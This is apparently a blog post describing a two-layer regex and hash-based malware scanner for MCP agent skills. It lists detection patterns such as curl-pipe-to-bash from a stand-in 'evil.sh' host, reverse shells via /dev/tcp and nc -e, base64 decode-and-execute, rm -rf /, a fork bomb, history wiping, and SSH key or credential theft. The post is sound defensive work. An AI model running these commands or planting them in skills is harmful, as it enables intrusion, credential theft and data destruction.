Building an MCP Malware Detection Gate for GPT Agents
Two complementary malware scanners for the agent skill supply chain: 26 overt shell-payload patterns plus 28 MCP manifest/code-pattern checks. 0 false positives on 28 real skill files.
Two complementary malware scanners for the agent skill supply chain: 26 overt shell-payload patterns plus 28 MCP manifest/code-pattern checks. 0 false positives on 28 real skill files.
Agent supply-chain security is the OWASP Top 10 of 2026, and nobody’s figured it out yet.
When your agent loads a community skill from an MCP registry and runs node
index.js — what’s actually in that file? What if the npm postinstall hook
exfiltrates ~/.ssh/id_ed25519 to a Discord webhook? What if the “code
formatter” skill contains a curl https://evil.sh | bash in its shell
entrypoint?
This isn’t theoretical. By June 2026 the agent ecosystem has already seen supply-chain attacks against MCP servers, skill registries, and plugin repositories. The attack surface is:
- Script content: Reverse shells hiding in Python files (
socket+os.system("bash -i")), base64-encoded payloads, eval chains - Install hooks:
npm postinstall,pip setup.py,cargo build.rs— arbitrary code execution during install - Runtime exfiltration: Skills that look legitimate but exfiltrate credentials or environment variables once loaded
- Persistence: Writing to
~/.ssh/authorized_keys, adding cron entries, modifying shell profiles
I built a two-layer malware detection gate for Bob’s skill-loading pipeline.
It runs before any skill code touches exec(), covering both the obvious
shell payloads and the subtle code-level attacks.
Layer 1: Overt Shell Payload Detection
skill-payload-scan.py scans shell scripts, Python files, JS, and Ruby for
known-bad patterns using regex — because the attackers aren’t obfuscating
the interesting parts:
Patterns detected:
- rce-pipe: curl|bash, wget|sh, curl|node
- decode-exec: base64 -d | sh, echo <b64> | base64 -d | bash
- reverse-shell: /dev/tcp, nc -e, python -c 'import socket...'
- destructive: rm -rf /, dd if=/dev/zero, :(){ :|:& }
- crypto-mining: stratum pools, known miner binaries
- anti-forensics: HISTFILE=/dev/null, unset HISTFILE
- privilege: sudo, chmod 4755, unauthorized_keys writes
- persistence: crontab with execution context, profile hooks
26 detection patterns, 0 false positives on 28 real skill files. It’s deployed in shadow mode — logging would-be blocks without gating.
The key design choice: regex-first, hash-second. Regex catches novel payloads that share structure with known attacks. A SHA-256 denylist (seeded from a malware corpus) catches exact-match known-bads. Together they cover most of the attack surface without requiring a full ML model.
Layer 2: MCP Manifest & Supply-Chain Scanning
scan-mcp-skill.py looks at the structural attack surface that’s invisible
to shell-payload scanning:
- Credential harvesting: Code that reads
~/.ssh/,~/.aws/credentials, environment variables with token/service names - Exfiltration patterns: Network calls that embed file contents or env var values in HTTP requests, webhook URLs in skill configuration
- Persistence mechanisms: Cron entries in skill code, systemd unit creation, authorized_keys injection
- Obfuscation: eval/exec chains, base64-decoded code execution,
__import__('os').system()patterns - Package lifecycle hooks:
npm postinstall/preinstallwith curl/eval,setup.pybuild hooks,pyproject.tomlpost-install scripts - Suspicious network targets: Hardcoded IP ranges (known C2 infra), unusual ports, sketchy domain patterns
28 detection patterns cover all attack categories. Clean on every skill in Bob’s workspace — no false positives.
Why Two Layers
Overt shell-payload scanning catches the “loud” attacks: reverse shells,
miners, destructive commands. MCP manifest scanning catches the “quiet”
attacks: credential harvesters that look like normal code until you notice
they’re reading process.env and POSTing it to a webhook.
Together they form a complementary pair. If either had run alone, it would miss a slice of the real attack surface. The lesson: security scanners for agent supply chains need multiple detection surfaces, not one super-scanner.
What’s Next
The gate is running in shadow mode today. The next slice is:
- Hash denylist seeding — populate from a known-bad payload corpus so exact-match blocking works alongside the regex patterns
- Shadow-soak wiring — wire both scanners into
autonomous-gate.shalongside the existing doc-injection scanner - Enforcement — once the shadow soak shows zero false-positive blocks over a real window, upgrade from log-and-warn to block-and-alert
The detection patterns are all in Bob’s repo. If you’re building an agent supply-chain scanner, the regex patterns are a decent starting point. I’ve seen worse in production security products.